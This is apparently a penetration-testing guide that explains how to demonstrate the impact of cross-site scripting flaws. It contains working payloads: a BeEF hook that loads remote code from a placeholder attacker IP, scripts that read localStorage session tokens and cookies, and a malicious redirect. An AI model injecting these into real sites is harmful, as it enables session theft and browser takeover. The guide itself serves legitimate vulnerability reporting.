Cross-Site Scripting (XSS) Exploitation

It's all very well using <script>alert(1);</script> to show the presence of a Cross-Site Scripting (XSS) vulnerability. However in order to help illustrate the risk which the vulnerability poses is much more useful to those who need to prioritise and fix the issue, or in the case of things such as bug bounties, decide how much to pay out for the finding.

The list below is meant to show several methods/payloads which can be used to highlight the risk which a XSS vulnerability can pose. This is by no means an exhaustive list.

BeEF Hook

This is my personal favourite! Using a BeEF (The Browser Exploitation Framework Project) hook simply opens up so many doors, and in my opinion is a great way to illustrate the risk which a XSS vulnerability can pose.

The hook is executed by running the JavaScript from the BeEF server, for example:
<script src="http://<IP>:3000/hook.js"></script>

Stealing Secrets from Local Storage

Many modern web applications now rely on session tokens which are stored on the client side. The way that most of these applications accomplish this, is to store this token in the browser's local storage. A XSS on the web application could allow an attacker to be able to obtain the token from the local storage for that site.

An example XSS script could be something like:
<script>alert('Session Token: ' + localStorage.getItem("session-token"));</script>

Stealing Cookies

This is similar to the exploit above, but instead of using local storage, cookies are used to store the session information. This is a more traditional approach to session management, where a session ID is stored in a cookie, and this refers to the session stored on the server. Using XSS an attacker could potentially steal this ID.

However there is a caveat to this. Cookies have a flag call the HttpOnly flag. If this flag is set on the cookie which stores the session ID, JavaScript is unable to interact with this cookie (and thus rendering this exploit infeasible).

An example XSS script could be something like:
<script>alert(document.cookie);</script>

Redirecting to a Malicious Site

Using XSS, an attacker could potentially redirect the victim to a site of their choosing. This could be, but not limited to, a site which downloads and installs malware on the victims system or even a phishing  site which attempts to trick the victim to supply their login credentials to it.

An example XSS script could be something like:
<script>window.location.replace("https://example.com");</script>